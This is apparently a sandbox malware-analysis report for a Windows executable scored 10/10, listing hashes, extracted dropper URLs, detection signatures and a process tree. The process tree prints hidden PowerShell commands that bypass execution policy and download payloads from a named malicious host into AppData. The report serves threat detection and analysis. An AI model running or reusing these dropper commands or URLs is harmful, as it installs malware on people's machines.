Overview

overview

10

Static

static

10

0811cf7c27...de.exe

windows7-x64

9

0dd0b31f05...24.exe

windows7-x64

7

1ad888606f...e0.exe

windows7-x64

3

1c77a07e45...95.exe

windows7-x64

10

23f1c183af...bc.exe

windows7-x64

10

38e891599d...90.exe

windows7-x64

10

3a13e092e9...db.exe

windows7-x64

4

3b9dabd99d...82.exe

windows7-x64

3

58fe9776f3...06.exe

windows7-x64

10

5ab93bd422...11.exe

windows7-x64

3

6b06c25fc6...43.exe

windows7-x64

10

6cc8001c9b...07.exe

windows7-x64

1

73ca5dd6d4...3f.exe

windows7-x64

10

7b931d48ea...f0.exe

windows7-x64

10

7d6892645b...0f.exe

windows7-x64

10

9036aeb570...7e.exe

windows7-x64

3

9b6289a8bf...2b.exe

windows7-x64

8

acf2b76704...a7.exe

windows7-x64

3

af2f191f8d...53.exe

windows7-x64

10

cc7045d9fe...ab.dll

windows7-x64

10

d1a6bd542d...a8.exe

windows7-x64

10

efe947e0a8...69.exe

windows7-x64

10

f13edd0b86...9f.exe

windows7-x64

10

Resubmissions

27-11-2024 13:29

241127-qrb37svpcv 10

27-11-2024 09:27

241127-le54astrfj 10

Analysis

  • max time kernel
    839s
  • max time network
    841s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 09:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BETOL8EIGMBVJV25PPIG.temp
    Filesize

    7KB

    MD5

    784b9818145f42b69a5152fbf21ccbb6

    SHA1

    3978e7fb42ce4f79133fc26b7abc03c00396b115

    SHA256

    4ce84f53699cb0f7c97e1f66717fac6af887e310610799f4089bafaf41d3f0f4

    SHA512

    0ced222108f162ef46bdedd9a71c8464ea53ebc37e19d04a29e8ccb320e47998e042c6bd97c1d420ee012859c0ada5c9582b2b08f22e54474c5dbcdd4e603785

    Download Submit

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd
    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

    Download Submit

  • memory/1912-4-0x0000000002780000-0x0000000002790000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1932-18-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1932-19-0x00000000021D0000-0x00000000021D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2728-10-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2728-11-0x000000001B790000-0x000000001BA72000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2728-12-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download